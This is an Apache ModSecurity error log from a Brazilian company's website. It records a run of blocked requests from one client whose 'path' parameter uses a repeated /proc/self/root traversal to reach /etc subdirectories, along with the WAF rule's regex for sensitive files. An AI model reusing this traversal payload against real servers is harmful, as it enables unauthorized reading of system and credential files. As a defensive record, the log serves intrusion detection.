[Wed Mar 18 11:32:01.851672 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.243.128:47088] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3YdY0UrI5A3LftIy3DQAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:02.658701 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.243.128:47088] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3YtY0UrI5A3LftIy3EAAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:04.132904 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.243.128:47094] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3ZOyqAr6etmhZHNrKfgAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:05.423792 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:47108] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3Zfu8EFLIOrSqIpsLzAAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:07.021623 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.243.128:47114] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3Zvu8EFLIOrSqIpsL0AAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:10.611086 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.243.128:47130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3aimAPhZkrhU8w4l1kAAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:13.014874 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:39310] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3bda6ubjKNq_cu4ajOAAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:14.299073 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.243.128:39312] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3bvu8EFLIOrSqIpsL2AAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:15.563877 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:39322] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3b9a6ubjKNq_cu4ajQwAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:16.851004 2026] [:error] [pid 15051:tid 140411582465792] [client 74.7.243.128:39338] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3cCmAPhZkrhU8w4l1kQAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:18.130303 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.243.128:39350] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3ctY0UrI5A3LftIy3FgAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:19.430078 2026] [:error] [pid 15051:tid 140411590858496] [client 74.7.243.128:58524] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3cymAPhZkrhU8w4l1kwAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:25.791304 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.243.128:58526] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3edY0UrI5A3LftIy3IwAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:27.831228 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.243.128:58540] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3e_u8EFLIOrSqIpsL2wAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:29.223575 2026] [:error] [pid 29882:tid 140411641214720] [client 74.7.243.128:58556] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3fUzinOy1jxa1j4cdzQAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:30.517031 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:34606] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3fta6ubjKNq_cu4ajTgAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:31.843303 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.243.128:34620] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3f9Y0UrI5A3LftIy3JQAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:33.089016 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:34632] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3gcdf6f5d65gmYZTdoQAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:36.839691 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.243.128:34640] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3hNY0UrI5A3LftIy3KgAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:39.001559 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.243.128:34648] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3huw_le52K8_3pV3oHgAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:40.320595 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.243.128:42272] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3iAkwaGbbGflqUZAYCgAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:41.683990 2026] [:error] [pid 15051:tid 140411741927168] [client 74.7.243.128:42288] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] 